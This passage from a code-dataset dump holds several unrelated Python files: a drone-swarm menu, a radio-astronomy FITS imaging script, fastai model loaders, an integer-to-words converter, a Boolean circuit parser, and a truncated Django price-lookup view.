swarm2.swarm_separate(crazyflies_1, crazyflies_2)\n swarm_3.takeoff_ascyn(hight+1, 10)\n swarm_4.takeoff_ascyn(hight-1, 10)\n swarm_3.take_formation(distance, 1, hight+1, 0, 0)\n swarm_4.take_formation(distance, sep_swarm, hight-1, 0, 0)\n swarm_3.navigation_2([-4,-4,hight+1], 10)\n swarm_4.navigation_2([4,4,hight-1], 10)\n\n print(\"tekrar birleşim yapılıyor....\")\n timeHelper.sleep(10)\n swarm2.take_formation(distance,sep_swarm, hight, 0, 0)\n #not working like expected\n elif selection == 6 :\n point_x = float(input(\"x : \"))\n point_y = float(input(\"y : \"))\n angle = m.atan((point_y-cur_y)/(point_x-cur_x))\n angle = -angle*180/m.pi\n swarm2.rotasyon_3(swarm2.sum_rot+angle, cur_x, cur_y, hight, distance)\n swarm2.navigation_2([point_x,point_y,hight], 10)\n cur_x = point_x\n cur_y = point_y\n elif selection == 7:\n swarm2.takeoff_scyn(0, 5)\n hight = 0\n \n\n\ntimeHelper.sleep(10)\n\nswarm2.change_formation(1)\n\n\ntimeHelper.sleep(10)\n\n\n\n","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616447589","text":"direction=\"J2000 10:04:02.090 -6.28.29.604\"\ncl.done()\n\ndir_data = \"../../../ngc3110/ana/other/photmetry/\"\ndir_fits = \"../../../ngc3110/ana/data_nyquist/\"\ndata_flux_normal = \"ngc3110_flux_sfr.txt\"\ndata = np.loadtxt(dir_data + data_flux_normal,\n usecols = (0,1,2,3))\nd_ra, d_decl = data[:,0], data[:,1]\nd_halpha, d_vla = data[:,2], data[:,3]\n\n### nyquist2fits: h-alpha\nfor i in range(len(data)):\n cl.addcomponent(dir=str(d_ra[i])+\"deg, \"+str(d_decl[i])+\"deg\",\n flux=d_vla[i], fluxunit=\"Jy\",\n freq=\"230.0GHz\",\n shape=\"Gaussian\",\n majoraxis=\"3.00arcsec\",\n minoraxis=\"3.00arcsec\",\n positionangle=\"0.0deg\")\n\nia.fromshape(dir_fits + \"nyquist_vla_1.45GHz.image\",\n [50,50,1,1],\n overwrite = 
True)\ncs=ia.coordsys()\ncs.setunits([\"rad\",\"rad\",\"\",\"Hz\"])\ncell_rad=qa.convert(qa.quantity(\"1.6arcsec\"),\"rad\")[\"value\"]\ncs.setincrement([-cell_rad,cell_rad],\"direction\")\ncs.setreferencevalue([qa.convert(\"151.008708deg\", \"rad\")[\"value\"],\n qa.convert(\"-6.474890deg\",\"rad\")[\"value\"]],\n type = \"direction\")\ncs.setreferencevalue(\"230GHz\", \"spectral\")\ncs.setincrement(\"1GHz\", \"spectral\")\nia.setcoordsys(cs.torecord())\nia.setbrightnessunit(\"Jy/pixel\")\nia.modify(cl.torecord(),subtract=False)\nexportfits(imagename= dir_fits + 'nyquist_vla_1.45GHz.image',\n fitsimage= dir_fits + 'nyquist_vla_1.45GHz.fits',\n overwrite = True)\nia.close()\n","sub_path":"scripts_image_ngc3110/mypaper06_ny2fits/mypaper06_ny2fits_vla_1.45GHz.py","file_name":"mypaper06_ny2fits_vla_1.45GHz.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"207540303","text":"from fastai.text import *\n\n\ndef load_language_model():\n path = 'webapp/language_model'\n path_data_lm = 'data_lm_book.pkl'\n path_learn_lm = 'mini_train_lm_book'\n data_lm = load_data(path, path_data_lm)\n learn_language_model = language_model_learner(\n data_lm, AWD_LSTM, pretrained=False).load(path_learn_lm, with_opt=False)\n\n return learn_language_model\n\n\ndef load_classification_nlp():\n path = 'webapp/class'\n path_data_class = 'data_clas'\n path_learn_class = 'mini_train_clas100_with'\n data_class = load_data(path, path_data_class)\n learn_classification_nlp = text_classifier_learner(\n data_class, AWD_LSTM, pretrained=False).load(path_learn_class, with_opt=False)\n\n return learn_classification_nlp\n","sub_path":"webapp/load_data_nlp.py","file_name":"load_data_nlp.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"298501568","text":"# This Python program gets an integer input from a user 
and outputs the same integer in words\r\n# for example: 89,475,872,465 -->\r\n# eighty nine billion, four hundred and seventy five million, eight hundred and seventy two thousand, four hundred and sixty five\r\n\r\n# Get input from a user\r\n\r\nfrom functools import reduce\r\n\r\n# get integer from user input\r\nx = input('Please enter a positive integer less than 10**18: \\n')\r\nx = int(x)\r\n\r\n# ------------------------------------------------------------\r\n# Initialize\r\n\r\n# highest power of 10 this program can deal with\r\npower = 17\r\n\r\n# dictionary of powers of 1000 in words\r\npowers_in_words = {(0,1,2): '', (3,4,5): 'thousand', (6,7,8): 'million', (9,10,11): 'trillion', (12,13,14): 'gazillion', (15,16,17): 'super - gazillion'}\r\n\r\nsmall_dict = {0: '', 1: 'one', 2: 'two', 3: 'three', 4: 'four', 5: 'five',\r\n 6: 'six', 7: 'seven', 8: 'eight', 9: 'nine', 10: 'ten',\r\n 11: 'eleven', 12: 'twelve', 13: 'thirteen', 14: 'fourteen', 15: 'fifteen',\r\n 16: 'sixteen', 17: 'seventeen', 18: 'eighteen', 19: 'nineteen'}\r\n\r\nbig_dict = {2: 'twenty', 3: 'thirty', 4: 'forty', 5: 'fifty', 6: 'sixty', 7: 'seventy', 8: 'eighty', 9: 'ninety'}\r\n\r\n# this number remembers the 10th multiple so that we can add it to the ones multiple\r\ncombined_num = 0\r\n\r\n# list of integers that make up the input integer x\r\n# initialize to empty list\r\nint_list = []\r\n\r\n# word is only the word for a multiple of thousand, ex. 
five hundred and fifty three million\r\nword = []\r\n# combined_word is the combined list of all the words composing the entire integer, all the multiples of thousand\r\n# that's the word representing the entire input integer x\r\ncombined_word = []\r\n\r\n# ------------------------------------------------------------\r\n# Define functions\r\n\r\ndef int_to_word_decider(largest_remaining_multiple_of_10, largest_power_of_10):\r\n '''This function decides what word an integer corresponds to,\r\n based on it's power of 10 and the integer \r\n '''\r\n word = []\r\n # this number remembers the 10th multiple so that we can add it to the ones multiple\r\n global combined_num \r\n\r\n if largest_power_of_10 == 2:\r\n word.append(small_dict[largest_remaining_multiple_of_10])\r\n word.append('hundred')\r\n elif largest_power_of_10 == 1:\r\n if largest_remaining_multiple_of_10 == 1:\r\n combined_num += 10\r\n elif largest_remaining_multiple_of_10 > 1:\r\n word.append(big_dict[largest_remaining_multiple_of_10])\r\n else:\r\n combined_num += largest_remaining_multiple_of_10\r\n word.append(small_dict[combined_num])\r\n\r\n return word\r\n\r\n\r\ndef hundreds_to_words(int_list):\r\n '''This function converts a list of integers, representing a number less than 1000 into words.\r\n Input: int_list\r\n a list of integers representing a positive integer less than 1000\r\n this list must be non-empty and only of length 1 or 2 or 3\r\n the index of each integer represents a power of 10\r\n ex. a list [6,5,9] represents a number 956\r\n\r\n Output: a string, the integer that the list represents, in words, ex. 
nine hundred and fifty six\r\n '''\r\n\r\n word = []\r\n \r\n while int_list != []:\r\n\r\n #largest_remaining_multiple_of_10 is the largest multiple of 10 element left in int_list\r\n largest_remaining_multiple_of_10 = int_list[0]\r\n\r\n #largest_power_of_10 is the power of 10 that largest_remaining_multiple_of_10 is a multiple of\r\n #or just it's index in the int_list\r\n largest_power_of_10 = len(int_list)-1\r\n\r\n #update the word represending the integer\r\n word.append(int_to_word_decider(largest_remaining_multiple_of_10, largest_power_of_10))\r\n\r\n # remove the first element from the remaining int_list that you just took and put into a word\r\n int_list.pop(0)\r\n\r\n return word\r\n\r\ndef flatten(nested_list):\r\n '''This function flattens a list,\r\n Input: nested list of lists or a flat list (any list)\r\n Output: a list composed of lowers level elements ex. strings or integers '''\r\n\r\n flat_list = []\r\n\r\n for e in nested_list:\r\n if isinstance(e, list):\r\n for i in e:\r\n if isinstance(i, list):\r\n flatten(i)\r\n else:\r\n flat_list.append(i)\r\n else:\r\n flat_list.append(e)\r\n\r\n return flat_list\r\n\r\ndef rm_leading_zeros(int_list):\r\n '''This function removes leading zeroes from a list of integers\r\n If the input is a list of all zeroes, the output will be an empty list'''\r\n\r\n while int_list[0] == 0:\r\n int_list.pop(0)\r\n if int_list == []:\r\n break\r\n\r\n return int_list\r\n\r\ndef rm_trailing_empties(strings_list):\r\n '''This finction takes a list of strings as input and removes any empty strings\r\n at the end of the list, returning a new list, such that the last element is a non-empty string\r\n if strings_list is empty, or contains only empty strings, it returns an empty list'''\r\n\r\n if strings_list == []:\r\n return strings_list\r\n\r\n strings_list.reverse()\r\n \r\n while strings_list[0] == '':\r\n strings_list.pop(0)\r\n if strings_list == []:\r\n break\r\n\r\n strings_list.reverse()\r\n \r\n return 
strings_list\r\n \r\ndef list_to_string(word_list):\r\n '''This function takes a list of words as input and converts it to a proper sentence with ands ans spaces in the right places'''\r\n\r\n sentence = []\r\n word_list = rm_trailing_empties(word_list)\r\n\r\n for i in range(len(word_list)):\r\n\r\n e = word_list[i]\r\n e_is_last = (i == len(word_list)-1)\r\n \r\n if e != '':\r\n sentence.append(e)\r\n\r\n if e_is_last:\r\n break\r\n \r\n if e in powers_in_words.values():\r\n #if there are only 1 or 2 elements left in word_list after e\r\n if i >= len(word_list)- 3:\r\n sentence.append(' and ')\r\n else:\r\n sentence.append(', ')\r\n elif e == 'hundred':\r\n #if the next element is thousand, million, trillion,...\r\n if word_list[i+1] in powers_in_words.values():\r\n sentence.append(' ')\r\n else:\r\n sentence.append(' and ')\r\n else:\r\n sentence.append (' ')\r\n\r\n sentence = reduce(lambda x,y: x+y, sentence)\r\n \r\n return sentence\r\n\r\n# ------------------------------------------------------------\r\n# Convert the input integer x into a list of integers it is composed of int_list\r\n# the index of an integer in int_list corresponds to the power of 10 that it's a multiple of\r\n\r\nfor p in range(power,-1,-1):\r\n power_of_10 = x//10**p\r\n x = x%10**p\r\n int_list.append(power_of_10)\r\n\r\n# remove leading zeroes from int_list\r\nint_list = rm_leading_zeros(int_list)\r\n\r\nint_list.reverse()\r\n\r\n# ------------------------------------------------------------\r\n# Extract groups of multiples of thousand from the input integer x\r\n\r\n# largest power of 10 that x is divisible by\r\npower = len(int_list)-1\r\n\r\n# define groups of powers of 1000 of the components of x\r\ngroup_index = list(range(0,len(int_list),3))\r\n\r\n\r\n# loop though group_index to group the integers composing x into powers of 1000\r\ni=0\r\n\r\nwhile i< len(group_index)-1:\r\n \r\n sub_int_list = int_list[group_index[i]: group_index[i+1]]\r\n sub_int_list.reverse()\r\n #remove 
leading zeros from sub_int_list\r\n sub_int_list = rm_leading_zeros(sub_int_list)\r\n powers_tuple = tuple(range(group_index[i], group_index[i+1]))\r\n \r\n i += 1\r\n \r\n #pass sub_int_list to the hundreds_to_words function and get the <= hundreds number in words \r\n word = hundreds_to_words(sub_int_list)\r\n word = flatten(word)\r\n\r\n if word != []:\r\n combined_word.append(powers_in_words[powers_tuple])\r\n combined_word.append(word)\r\n \r\n combined_num = 0\r\n \r\n# get the remaining biggest powers of 10 composing the input integer x\r\nsub_int_list = int_list[group_index[i]:]\r\nsub_int_list.reverse()\r\n#remove leading zeros from sub_int_list\r\nsub_int_list = rm_leading_zeros(sub_int_list)\r\n\r\npowers_tuple = tuple(range(group_index[i], group_index[i]+3))\r\n\r\n#pass sub_int_list to the hundreds_to_words function and get the <= hundreds number in words\r\nword = hundreds_to_words(sub_int_list)\r\nword = flatten(word)\r\n\r\ncombined_word.append(powers_in_words[powers_tuple])\r\ncombined_word.append(word)\r\ncombined_word.reverse()\r\n\r\ncombined_word = flatten(combined_word)\r\nsentence = list_to_string(combined_word)\r\n\r\nprint(sentence)\r\n","sub_path":"integers-to-words.py","file_name":"integers-to-words.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197745457","text":"#!/usr/bin/env python3\n\nclass BrokenCircuitException(Exception):\n '''This exception is thrown by the constructor of the Cicruit class if\n it detects either undefined signals or combinational loops.\n '''\n pass\n\nclass Node(object):\n '''Base class for circuit nodes'''\n\n __nextid__ = 0\n\n def __init__(self):\n self.kids = []\n self.id = Node.__nextid__\n Node.__nextid__ += 1\n\n def __lt__(self, other):\n return self.id < other.id\n\n def __hash__(self):\n return hash(7879 + self.id) * hash(type(self))\n\n def getID(self):\n '''Get unique node id (as int)'''\n return 
self.id\n\n def getChildren(self):\n '''Get child nodes of this node'''\n return self.kids\n\n def getChild(self, i):\n '''Get i-th child of this node'''\n return self.kids[i]\n\n def setChild(self, i, nd):\n '''Set i-th child of this node'''\n self.kids[i] = nd\n\n def support(self):\n return set()\n\nclass Literal(Node):\n '''A circuit node representing a constant Boolean value, which is\n either True or False.\n '''\n\n def __init__(self, b):\n Node.__init__(self)\n self.value = b\n\n def __repr__(self):\n if self.value:\n return '1'\n else:\n return '0'\n\n def getValue(self):\n '''Get the literal's value'''\n return self.value\n\n def support(self):\n return set()\n\nclass Variable(Node):\n '''A circuit node representing a named internal or input signal.'''\n\n def __init__(self, name):\n Node.__init__(self)\n self.name = name\n\n def __repr__(self):\n return ('%s' % self.name)\n\n def getName(self):\n '''Get the name of the signal'''\n return self.name\n\n def support(self):\n return {self.name}\n\nclass OpNode(Node):\n '''Abstract base class for unary and binary logic gates.'''\n\n def getOp(self):\n '''Get a string representation of the node's function'''\n return self.opstr\n\n def getFun(self):\n '''Get the gate function of the node'''\n return self.f\n\nclass BinOp(OpNode):\n '''A circuit node representing a binary logic gate.'''\n\n def __init__(self, f, opstr, x, y):\n Node.__init__(self)\n self.kids = [x, y]\n self.f = f\n self.opstr = opstr\n\n def __repr__(self):\n return ('(%s %s %s)' % (self.kids[0], self.opstr, self.kids[1]))\n\n def eval(self, x, y):\n '''Evaluate the node's function with the given inputs'''\n return self.f(x, y)\n\n def support(self):\n return self.getChild(0).support() | self.getChild(1).support()\n\nclass UnOp(OpNode):\n '''A circuit node representing a unary logic gate.'''\n\n def __init__(self, f, opstr, x):\n Node.__init__(self)\n self.kids = [x]\n self.f = f\n self.opstr = opstr\n\n def __repr__(self):\n return ('(%s %s)' 
% (self.opstr, self.kids[0]))\n\n def eval(self, x):\n '''Evaluate the node's function with the given input'''\n return self.f(x)\n\n def support(self):\n return self.getChild(0).support()\n\n\nclass Circuit(object):\n '''Class representing a logic circuit.'''\n\n def __init__(self, name, inputs, outputs, eqs):\n self.name = name\n self.inputs = {x.name for x in inputs}\n self.outputs = {x.name for x in outputs}\n self.equations = dict()\n for (x,e) in eqs:\n self.equations[x.name] = e\n self.check()\n\n def check(self):\n '''Perform sanity checks on the circuit: all outputs defined, all\n inputs unconstrained, no undefined signals, no combinational\n loops. This function is called by the constructor. \n '''\n\n # Check that all outputs are defined\n for x in self.outputs:\n if not x in self.equations.keys():\n raise BrokenCircuitException(\"Undefined output '%s'\" % x)\n\n # Check that inputs are unconstrained\n for x in self.inputs:\n if x in self.equations.keys():\n raise BrokenCircuitException(\"Over-constrained input '%s' \" % x)\n\n # Check that only defined signals are used\n deps = {x: self.equations[x].support() for x in self.equations.keys()}\n signals = self.inputs | self.outputs | self.equations.keys()\n for x,ys in deps.items():\n for y in ys:\n if not y in signals:\n raise BrokenCircuitException(\"Undefined signal '%s'\" % y)\n\n # Check that there are no combinational loops in the circuit\n for x in deps.keys():\n stack = []\n def visit(y):\n if y in stack:\n raise BrokenCircuitException(\"Combinational loop detected: %s -> %s\" % (' -> '.join(stack), y))\n if not y in deps.keys():\n return\n stack.append(y)\n for z in deps[y]:\n visit(z)\n stack.pop()\n visit(x)\n\n def clean(self):\n '''Clean up the structure of the circuit: Collapse nodes with single\n fanout, remove dead nodes.\n '''\n\n # Collapse non-fanout nodes\n signals = self.outputs | self.equations.keys() | self.inputs\n fanout = {s: set() for s in signals}\n deps = {x: 
self.equations[x].support() for x in self.equations.keys()}\n for x, ys in deps.items():\n for y in ys:\n fanout[y].add(x)\n collapse = {x for x,ys in fanout.items() if len(ys) == 1}.difference(self.inputs)\n print (\"======================\")\n print (\"COLLAPSE:\")\n print (collapse)\n print (\"======================\")\n def eval(nd, a, b):\n f = nd.getFun()\n return Literal(f(a.getValue(), b.getValue()))\n for x in self.getSignals():\n def subst(nd):\n if type(nd) == Variable:\n y = nd.getName()\n if y in collapse:\n return subst(self.equations[y])\n else:\n return nd\n elif type(nd) == UnOp:\n nd.setChild(0, subst(nd.getChild(0)))\n return nd\n elif type(nd) == BinOp:\n c1 = subst(nd.getChild(0))\n c2 = subst(nd.getChild(1))\n if type(c1) is Literal and type(c2) is Literal:\n return eval(nd, c1, c2)\n else:\n nd.setChild(0, c1)\n nd.setChild(1, c2)\n return nd\n else:\n return nd\n e = self.equations[x]\n self.equations[x] = subst(e)\n\n # Remove dead nodes\n deps = {x: self.equations[x].support() for x in self.equations.keys()}\n def dependencies(x):\n try:\n return deps[x]\n except KeyError:\n return set()\n reachable = {x for x in self.outputs}\n while True:\n imgs = [dependencies(x) for x in reachable]\n nextReachable = {y for dep in imgs for y in dep}\n if nextReachable.issubset(reachable):\n break\n reachable |= nextReachable\n dead = signals.difference(reachable).difference(self.inputs)\n print (\"DEAD:\")\n print (dead)\n print (\"======================\")\n for s in dead:\n del self.equations[s]\n\n def getInputs(self):\n '''Returns the set of input identifiers.\n '''\n return self.inputs\n\n def getOutputs(self):\n '''Returns the set of output identifiers.\n '''\n return self.outputs\n\n def getSignals(self):\n '''Returns the set of identifiers for which a logic equation is\n defined. 
This includes the circuit's outputs and any internal\n signals.\n '''\n return self.equations.keys()\n\n def getEquation(self, x):\n '''Returns the root node of the logic expression assigned to signal x,\n where x is either an output or an internal signal.\n '''\n try:\n return self.equations[x]\n except KeyError:\n raise BrokenCircuitException(\"Undefined signal '%s'\" % s)\n\n def simulate(self, inputs):\n '''Simulate the circuit. Takes as input a dictionary, mapping input\n names to Boolean values. Returns a dictionary mapping input, output\n and internal signal names to Boolean values.\n '''\n\n value = {i: x for (i,x) in inputs.items()}\n\n def sim(node):\n if type(node) == Literal:\n return node.value\n elif type(node) == Variable:\n x = node.name\n try:\n return value[x]\n except KeyError:\n y = sim(self.getEquation(x))\n value[x] = y\n return y\n elif type(node) == UnOp:\n y = sim(node.getChild(0))\n return node.eval(y)\n elif type(node) == BinOp:\n y = sim(node.getChild(0))\n z = sim(node.getChild(1))\n return node.eval(y, z)\n else:\n raise \"Invalid node type.\"\n\n signals = self.getSignals()\n for x in signals:\n value[x] = sim(self.getEquation(x))\n return {s: x for (s,x) in value.items() if s in signals | self.inputs}\n\n def dot(self):\n s = 'digraph %s {\\n' % self.name\n s += ' rankdir=\"LR\";\\n'\n for x in self.getInputs():\n s += ' %s [label=\\\"%s\\\", shape=circle];\\n' % (x, x)\n for x in self.getOutputs():\n s += ' %s [label=\\\"%s\\\", shape=diamond];\\n' % (x, x)\n signals = [x for x in self.getSignals() if not x in self.getOutputs()]\n for x in signals:\n s += ' %s [label=\\\"%s\\\", shape=hexagon];\\n' % (x, x)\n drawn = dict()\n def draw(nd):\n if nd in drawn.keys():\n return ''\n elif type(nd) is Literal:\n s = '\\t%d [label=\"%d\", shape=rect];\\n' % (nd.getID(), nd.getValue())\n drawn[nd] = str(nd.getID())\n return s\n elif type(nd) is Variable:\n drawn[nd] = nd.getName()\n return ''\n elif type(nd) is UnOp:\n s = 
draw(nd.getChild(0))\n cid = drawn[nd.getChild(0)]\n myid = str(nd.getID())\n s += ' %s [label=\"%s\", shape=square, style=filled, color=gray];\\n' % (myid, nd.getOp())\n s += ' %s -> %s;\\n' % (cid, myid)\n drawn[nd] = myid\n return s\n elif type(nd) is BinOp:\n s = draw(nd.getChild(0))\n s += draw(nd.getChild(1))\n myid = str(nd.getID())\n lid = drawn[nd.getChild(0)]\n rid = drawn[nd.getChild(1)]\n s += ' %s [label=\"%s\", shape=square, style=filled, color=gray];\\n' % (myid, nd.getOp())\n s += ' %s -> %s;\\n' % (lid, myid)\n s += ' %s -> %s;\\n' % (rid, myid)\n drawn[nd] = myid\n return s\n else:\n raise TypeError('invalid node')\n for x in self.getSignals():\n e = self.getEquation(x)\n s += draw(e)\n s += ' %s -> %s' % (drawn[e], x)\n s += '}'\n return s\n\n def __repr__(self):\n s = 'circ %s {\\n' % self.name\n s += '\\tinputs: %s\\n' % ', '.join(sorted(self.inputs))\n s += '\\toutputs: %s\\n' % ', '.join(sorted(self.outputs))\n for x, e in self.equations.items():\n s += '\\t%s = %s\\n' % (x, e)\n s += '}'\n return s\n\n# ========================================================================= Parser\n\nfrom funcparserlib.parser import *\nfrom funcparserlib.parser import with_forward_decls\nfrom tokenize import generate_tokens, TokenInfo\nfrom io import StringIO\nfrom functools import reduce\n\nimport token\n\n# FIXME: There seems to be an inconsistency between the token.type and\n# the type constants defined in token!\nMY_NEWLINE = 58\nMY_NEWLINE2 = 56\n\ndef tokenize(s):\n return [t for t in generate_tokens(StringIO(s).readline)\n if t.type not in [token.ENDMARKER, token.NEWLINE, MY_NEWLINE, MY_NEWLINE2]]\n\ndef tokval(tok):\n return tok.string\n\ndef make_bool(s):\n return s == '1'\n\n# @RULE:\n# boolean ::= '1' | '0'\nboolean = (\n some(lambda tok: tok.type == token.NUMBER and tok.string in ['1','0'])\n >> tokval\n >> make_bool\n >> Literal\n)\n\n# @RULE\n# variable ::= NAME (as Variable)\nvariable = (\n some(lambda tok: tok.type == token.NAME)\n >> 
tokval\n >> Variable\n)\n\n# @RULE\n# variable ::= NAME (as string)\nname = (\n some(lambda tok: tok.type == token.NAME)\n >> tokval\n)\n\n# Operator functor\nop = (\n lambda s: some(lambda tok: tok.type == token.OP and tok.string == s)\n >> tokval\n)\n\ncomma = op(',')\n\n# Keyword functor\nkeyword = (\n lambda s: some(lambda tok: tok.type == token.NAME and tok.string == s)\n >> tokval\n )\n\n# @KEYWORD 'inputs'\ninp = keyword('inputs')\n\n# @KEYWORD 'outputs'\noutp = keyword('outputs')\n\n# @KEYWORD 'circ'\ncirc = keyword('circ')\n\nconst = lambda x: lambda _: x\n\n# Functor for operator construction. Returns a parser functor that\n# results in the second argument f, the function associated with the\n# operator.\nmakeop = lambda s, f: op(s) >> const(f)\n\n# Functor constructing a binary node\ndef make_node(f, opstr):\n return lambda x, y: BinOp(f, opstr, x, y)\n\n# Functor constructing a unary node\ndef make_unode(f, opstr):\n return lambda x: UnOp(f, opstr, x)\n\n# Functor constructing an output, which is just a pair of a variable\n# and an expression\ndef make_output(x, e):\n return (x, e)\n\n# Binary operators\nimport operator\nand_ = makeop('&', make_node(operator.and_, '&'))\nor_ = makeop('|', make_node(operator.or_,'|'))\nxor = makeop('^', make_node(operator.xor,'^'))\nnot_ = makeop('~', make_unode(operator.not_,'~'))\nasgn = makeop('=', make_output)\n\n# Evaluate a tree-ish expression by folding (reducing) it\ndef eval_expr(z, l):\n return reduce(lambda s, y: y[0](s, y[1]), l, z)\n\n# Evaluate a unary expression\ndef eval_uexpr(f, x):\n return f(x)\n\n# Evaluate a binary expression\ndef eval_binexpr(x, f, y):\n return f(x, y)\n\n# Assemble nested list\ndef assemble(x, y):\n if type(y) is list:\n return [x] + y\n else:\n return [x, y]\n\n# Currying\nunarg = lambda f: lambda x: f(*x)\n\n# Curried functors for evaluation functions and constructors\nf = unarg(eval_expr)\ng = unarg(eval_uexpr)\nh = unarg(eval_binexpr)\ncollect = unarg(assemble)\nmake_circ = 
unarg(Circuit)\n\n# @RULE:\n# primary ::= boolean | variable | '(' expr ')'\n@with_forward_decls\ndef primary():\n return boolean | variable | ((op('(') + expr + op(')')) >> (lambda x: x[1]))\n\n# @RULE\n# literal ::= not primary | primary\nliteral = not_ + primary >> g | primary\n\n# @RULE\n# minterm ::= literal (and literal)*\nminterm = literal + many(and_ + literal) >> f\n\n# @RULE\n# esop ::= minterm (xor minterm)*\nesop = minterm + many(xor + minterm) >> f\n\n# @RULE\n# expr \"\"= esop (or esop)*\nexpr = esop + many(or_ + esop) >> f\n\n# @RULE\n# assign = variable '=' expr\nassign = variable + asgn + expr >> h\n\n# @RULE\n# varlist ::= variable (',' variable)*\nvarlist = variable + many(skip(comma) + variable) >> collect\n\n# @RULE\n# inputs ::= 'inputs' ':' varlist\ninputs = skip(inp) + skip(op(':')) + varlist\n\n# @RULE\n# outputs ::= 'outputs' ':' varlist\noutputs = skip(outp) + skip(op(':')) + varlist\n\n# @RULE\n# body ::= (assign)*\nbody = many(assign)\n\n# @RULE\n# circuit ::= 'circ' name '{' inputs outputs body '}' EOF\ncircuit = (skip(circ) + name\n + skip(op('{'))\n + inputs\n + outputs\n + body\n + skip(op('}'))\n + skip(finished)) >> make_circ\n\n\nred = '\\033[31m'\nblue = '\\033[34;1m'\ngreen = '\\033[32m'\ncyan = '\\033[36m'\nnormal = '\\033[0m'\n\ndef print_info(message):\n print (cyan + \"[INFO ] \" + normal + message)\n\ndef print_error(message):\n print (red + \"[ERROR] \" + normal + message)\n\n\n# main parse function\ndef parse(filename):\n '''Parse a circuit from a given file'''\n\n print_info(\"Parsing file '%s'\" % filename)\n try:\n with open(filename, 'r') as f:\n s = f.read()\n tok = tokenize(s)\n return circuit.parse(tok)\n except FileNotFoundError as e:\n print_error(\"Could not open file '%s'\" % filename)\n raise e\n except BrokenCircuitException as e:\n print_error(\"%s\" % e)\n raise e\n except NoParseError as e:\n epos = e.state.pos\n etok = tok[epos]\n line = etok.line\n start = etok.start[1]\n end = etok.end[1]\n lineNo = 
etok.start[0]\n print_error(\"Syntax error in line %d:\" % lineNo)\n print_error(\"%s\" % line.replace('\\n',''))\n print_error((' '*start) + ('~'*(end-start+1)))\n raise e\n \n \n","sub_path":"TP1/circuit/circuit.py","file_name":"circuit.py","file_ext":"py","file_size_in_byte":17023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"123059616","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\BitBucket\\djmicrosip_apps\\django_microsip_consultaprecio\\django_microsip_consultaprecio\\views.py\n# Compiled at: 2017-09-22 14:04:55\nfrom microsip_api.comun.sic_db import get_conecctionname, first_or_none\nfrom django.db import connections\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nimport csv\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic.list import ListView\nfrom .forms import *\nfrom django.core import management\nfrom django.db import router\n\n@login_required(login_url='/login/')\ndef index(request, template_name='django_microsip_consultaprecio/index.html'):\n return render_to_response(template_name, {}, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login/')\ndef PrecioArticuloView(request, template_name='django_microsip_consultaprecio/precioarticulo.html'):\n form = ArticuloSearchForm(request.POST or None)\n nombre_empresa = Registry.objects.get(nombre='SIC_ConsultaPrecio_NombreEmpresa').get_value()\n if not nombre_empresa:\n nombre_empresa = ''\n slogan = Registry.objects.get(nombre='SIC_ConsultaPrecio_Slogan').get_value()\n if not slogan:\n slogan = ''\n cliente_eventual = Registry.objects.get(nombre='SIC_ConsultaPrecio_Cliente').valor\n msg = ''\n variable = ''\n 
articulo = ''\n precio_actual = 0\n descuento = 0\n art = None\n precio_original = 0\n ahorro = 0\n if form.is_valid():\n clave = form.cleaned_data['clave']\n try:\n art = ArticuloClave.objects.get(clave=clave)\n articulo = art.articulo\n except Exception as e:\n msg = 'No se encontro ningun articulo con esa clave.'\n else:\n try:\n articuloprecio = ArticuloPrecio.objects.get(articulo=articulo, precio_empresa__id=42)\n precio_original = articuloprecio.precio\n connection_name = get_conecctionname(request.session)\n c = connections[connection_name].cursor()\n c.execute(\"execute procedure precio_con_impto(%s,%s,'N','P','S')\" % (articulo.id, precio_original))\n variable = c.fetchall()\n precio_original = variable[0][0]\n c.close()\n except Exception as e:\n precio_original = 0\n\n if articulo:\n descuento = articulo.get_descuento_total(cliente_id=cliente_eventual, unidades=1)\n if descuento != 0:\n precio_actual = precio_original - precio_original * descuento / 100\n ahorro = '%.2f' % (precio_original - precio_actual)\n precio_actual = '%.2f' % precio_actual\n else:\n precio_actual = round(precio_original, 2)\n precio_actual = '%.2f' % precio_original\n precio_original = '%.2f' % precio_original\n imagenes = ImagenSlideChecador.objects.all().order_by('id')\n context = {'Descuento': descuento, \n 'Articulo': articulo, \n 'form': form, \n 'msg': msg, \n 'precio_original': precio_original, \n 'precio_actual': precio_actual, \n 'Ahorro': ahorro, \n 'nombre_empresa': nombre_empresa, \n 'slogan': slogan, \n 'imagenes': imagenes}\n return render_to_response(template_name, context, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login/')\ndef InitialzeConfigurationDatabase(request):\n \"\"\" Agrega campos nuevos en tablas de base de datos. 
